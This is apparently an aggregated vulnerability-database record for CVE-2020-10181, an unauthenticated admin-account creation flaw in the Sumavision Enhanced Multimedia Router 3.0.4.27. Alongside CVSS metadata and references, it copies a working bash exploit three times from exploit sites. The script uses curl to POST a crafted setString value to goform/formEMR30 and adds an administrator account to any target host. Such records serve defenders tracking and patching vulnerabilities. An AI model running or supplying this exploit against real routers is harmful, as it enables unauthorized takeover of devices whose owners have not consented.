ID CVE-2020-10181
Type cve
Reporter cve@mitre.org
Modified 2020-03-16T16:15:00
Description
goform/formEMR30 in Sumavision Enhanced Multimedia Router (EMR) 3.0.4.27 allows creation of arbitrary users with elevated privileges (administrator) on a device, as demonstrated by a setString=new_user<1 >administrator<1 >123456 request.
{"id": "CVE-2020-10181", "bulletinFamily": "NVD", "title": "CVE-2020-10181", "description": "goform/formEMR30 in Sumavision Enhanced Multimedia Router (EMR) 3.0.4.27 allows creation of arbitrary users with elevated privileges (administrator) on a device, as demonstrated by a setString=new_user<*1*>administrator<*1*>123456 request.", "published": "2020-03-11T16:15:00", "modified": "2020-03-16T16:15:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-10181", "reporter": "cve@mitre.org", "references": ["http://packetstormsecurity.com/files/156746/Enhanced-Multimedia-Router-3.0.4.27-Cross-Site-Request-Forgery.html", "https://github.com/s1kr10s/Sumavision_EMR3.0", "https://www.youtube.com/watch?v=Ufcj4D9eA5o"], "cvelist": ["CVE-2020-10181"], "type": "cve", "lastseen": "2021-02-02T07:36:54", "edition": 5, "viewCount": 17, "enchantments": {"dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-34098"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:0C4FBE8ECC3630771C5B5C650D1AECBA"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156746"]}], "modified": "2021-02-02T07:36:54", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2021-02-02T07:36:54", "rev": 2}, "vulnersScore": 7.0}, "cpe": ["cpe:/o:sumavision:enhanced_multimedia_router_firmware:3.0.4.27"], "affectedSoftware": [{"cpeName": "sumavision:enhanced_multimedia_router_firmware", "name": "sumavision enhanced multimedia router firmware", "operator": "eq", "version": "3.0.4.27"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "cpe23": ["cpe:2.3:o:sumavision:enhanced_multimedia_router_firmware:3.0.4.27:*:*:*:*:*:*:*"], "cwe": ["CWE-269"], "scheme": null, "affectedConfiguration": [{"cpeName": "sumavision:enhanced_multimedia_router", "name": "sumavision enhanced multimedia router", "operator": "eq", "version": "-"}], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:o:sumavision:enhanced_multimedia_router_firmware:3.0.4.27:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}, {"cpe_match": [{"cpe23Uri": "cpe:2.3:h:sumavision:enhanced_multimedia_router:-:*:*:*:*:*:*:*", "vulnerable": false}], "operator": "OR"}], "operator": "AND"}]}, "extraReferences": [{"name": "http://packetstormsecurity.com/files/156746/Enhanced-Multimedia-Router-3.0.4.27-Cross-Site-Request-Forgery.html", "refsource": "MISC", "tags": [], "url": "http://packetstormsecurity.com/files/156746/Enhanced-Multimedia-Router-3.0.4.27-Cross-Site-Request-Forgery.html"}, {"name": "https://github.com/s1kr10s/Sumavision_EMR3.0", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://github.com/s1kr10s/Sumavision_EMR3.0"}, {"name": "https://www.youtube.com/watch?v=Ufcj4D9eA5o", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://www.youtube.com/watch?v=Ufcj4D9eA5o"}], "immutableFields": []}
{"zdt": [{"lastseen": "2020-03-17T09:07:09", "description": "Exploit for php platform in category web applications", "edition": 1, "published": "2020-03-17T00:00:00", "title": "Enhanced Multimedia Router 3.0.4.27 Cross Site Request Forgery Vulnerability", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-10181"], "modified": "2020-03-17T00:00:00", "id": "1337DAY-ID-34098", "href": "https://0day.today/exploit/description/34098", "sourceData": "# Exploit Title: Enhanced Multimedia Router 3.0.4.27 - Cross-Site Request Forgery (Add Admin)\r\n# Exploit Author: Miguel Mendez Z.\r\n# Vendor Homepage: www.sumavision.com\r\n# Software Link: http://www.sumavision.com/ensite/i.php?id=29\r\n# Version: EMR 3.0.4.27\r\n# CVE : CVE-2020-10181\r\n\r\n-----------------------Exploit Bash---------------------------\r\necho \"\"\r\nread -p \"Set Hostname: \" host\r\nread -p \"Set username: \" user\r\necho \"(The password should be between 6 and 32 in length)\"\r\nread -p \"Set password: \" pass\r\necho\r\necho \"[+] creating user...\"\r\nsleep 2\r\npostdata=$(curl -X POST -d \"type=11&cmd=3&language=0&slotNo=255&setString=$user<*1*>administrator<*1*>$pass\" \"http://$host/goform/formEMR30\" -s | grep -i \"0\")\r\nif echo \"$postdata\" | grep -q \"0</html>\"; then\r\necho \"[+] http://$host/frame_en.asp\"\r\necho \"[+] created access($user - $pass)\"\r\nelse\r\necho \"[-] user not created\"\r\nfi\r\n------------------------------------------------------\n\n# 0day.today [2020-03-17] #", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://0day.today/exploit/34098"}], "packetstorm": [{"lastseen": "2020-03-19T23:37:23", "description": "", "published": "2020-03-16T00:00:00", "type": "packetstorm", "title": "Enhanced Multimedia Router 3.0.4.27 Cross Site Request Forgery", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-10181"], "modified": "2020-03-16T00:00:00", "id": "PACKETSTORM:156746", "href": "https://packetstormsecurity.com/files/156746/Enhanced-Multimedia-Router-3.0.4.27-Cross-Site-Request-Forgery.html", "sourceData": "`# Exploit Title: Enhanced Multimedia Router 3.0.4.27 - Cross-Site Request Forgery (Add Admin) \n# Date: 2020-03-05 \n# Exploit Author: Miguel Mendez Z. \n# Vendor Homepage: www.sumavision.com \n# Software Link: http://www.sumavision.com/ensite/i.php?id=29 \n# Version: EMR 3.0.4.27 \n# CVE : CVE-2020-10181 \n \n-----------------------Exploit Bash--------------------------- \necho \"\" \nread -p \"Set Hostname: \" host \nread -p \"Set username: \" user \necho \"(The password should be between 6 and 32 in length)\" \nread -p \"Set password: \" pass \necho \necho \"[+] creating user...\" \nsleep 2 \npostdata=$(curl -X POST -d \"type=11&cmd=3&language=0&slotNo=255&setString=$user<*1*>administrator<*1*>$pass\" \"http://$host/goform/formEMR30\" -s | grep -i \"0\") \nif echo \"$postdata\" | grep -q \"0</html>\"; then \necho \"[+] http://$host/frame_en.asp\" \necho \"[+] created access($user - $pass)\" \nelse \necho \"[-] user not created\" \nfi \n------------------------------------------------------ \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/156746/exploit_sumavision.sh.txt"}], "exploitpack": [{"lastseen": "2020-04-01T20:39:56", "description": "\nEnhanced Multimedia Router 3.0.4.27 - Cross-Site Request Forgery (Add Admin)", "edition": 1, "published": "2020-03-16T00:00:00", "title": "Enhanced Multimedia Router 3.0.4.27 - Cross-Site Request Forgery (Add Admin)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-10181"], "modified": "2020-03-16T00:00:00", "id": "EXPLOITPACK:0C4FBE8ECC3630771C5B5C650D1AECBA", "href": "", "sourceData": "# Exploit Title: Enhanced Multimedia Router 3.0.4.27 - Cross-Site Request Forgery (Add Admin)\n# Date: 2020-03-05\n# Exploit Author: Miguel Mendez Z.\n# Vendor Homepage: www.sumavision.com\n# Software Link: http://www.sumavision.com/ensite/i.php?id=29\n# Version: EMR 3.0.4.27\n# CVE : CVE-2020-10181\n\n-----------------------Exploit Bash---------------------------\necho \"\"\nread -p \"Set Hostname: \" host\nread -p \"Set username: \" user\necho \"(The password should be between 6 and 32 in length)\"\nread -p \"Set password: \" pass\necho\necho \"[+] creating user...\"\nsleep 2\npostdata=$(curl -X POST -d \"type=11&cmd=3&language=0&slotNo=255&setString=$user<*1*>administrator<*1*>$pass\" \"http://$host/goform/formEMR30\" -s | grep -i \"0\")\nif echo \"$postdata\" | grep -q \"0</html>\"; then\necho \"[+] http://$host/frame_en.asp\"\necho \"[+] created access($user - $pass)\"\nelse\necho \"[-] user not created\"\nfi\n------------------------------------------------------\n\nReference:\nhttps://github.com/s1kr10s/Sumavision_EMR3.0/blob/master/exploit_sumavision.sh", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}